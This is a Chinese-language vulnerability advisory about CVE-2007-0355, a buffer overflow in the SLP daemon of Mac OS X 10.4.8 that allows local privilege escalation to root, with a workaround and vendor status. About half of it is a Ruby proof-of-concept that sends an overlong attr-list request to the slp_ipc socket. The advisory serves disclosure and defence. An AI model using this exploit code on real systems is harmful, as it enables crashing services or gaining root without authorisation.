受影响系统:
Apple Mac OS X 10.4.8
Apple MacOS X Server 10.4.8 描述:
BUGTRAQ ID: 22101
CVE(CAN) ID: CVE-2007-0355
Apple Mac OS X是苹果家族机器所使用的操作系统。
Mac OS X中所使用的服务位置协议(SLP)守护程序在处理注册请求的attr-list字段时存在缓冲区溢出漏洞,本地非特权用户可以通过提交恶意请求来触发这个漏洞,导致以root用户权限执行任意指令。
<*来源:Kevin Finisterre (dotslash@snosoft.com)
LMH (lmh@info-pull.com)
链接:http://projects.info-pull.com/moab/MOAB-17-01-2007.html
http://secunia.com./advisories/23796/
*>
测试方法:
#!/usr/bin/ruby
# (c) Copyright 2006 Lance M. Havok <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
# All pwnage reserved.
#
# Proof of concept for MOAB-17-01-2007
# http://projects.info-pull.com/moab/MOAB-17-01-2007.html
#
# Originally reported to Apple by Kevin, on 08/02/2006.
require 'socket'
target_path = (ARGV[0] || '/var/run/slp_ipc')
slp_socket = UNIXSocket.open(target_path)
payload = ("\x58" * 506)
payload << [0xdeadbeef].pack("V") # ...it expects a valid mem. address (ex. 0xbffff398)
stream = "\x01" + # SrvRqst = 1
"\x00\x13" + # Length of remaining fields? (up to attr-list)
"\x04\x00\x00\x00\x00\x00\x00" +
"\x00\x02\x00\x00" + # length of scope-list string
"\x78\x78" + # <scope-list>
"\xff\x03\x00\x00" + # length of attr-list string 0x3ff = 1023 in hex.
(payload) # <attr-list>
slp_socket.write stream
slp_socket.close
建议:
临时解决方法:
* 禁用个人文件共享和slpd。
厂商补丁:
Apple
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.apple.com
|
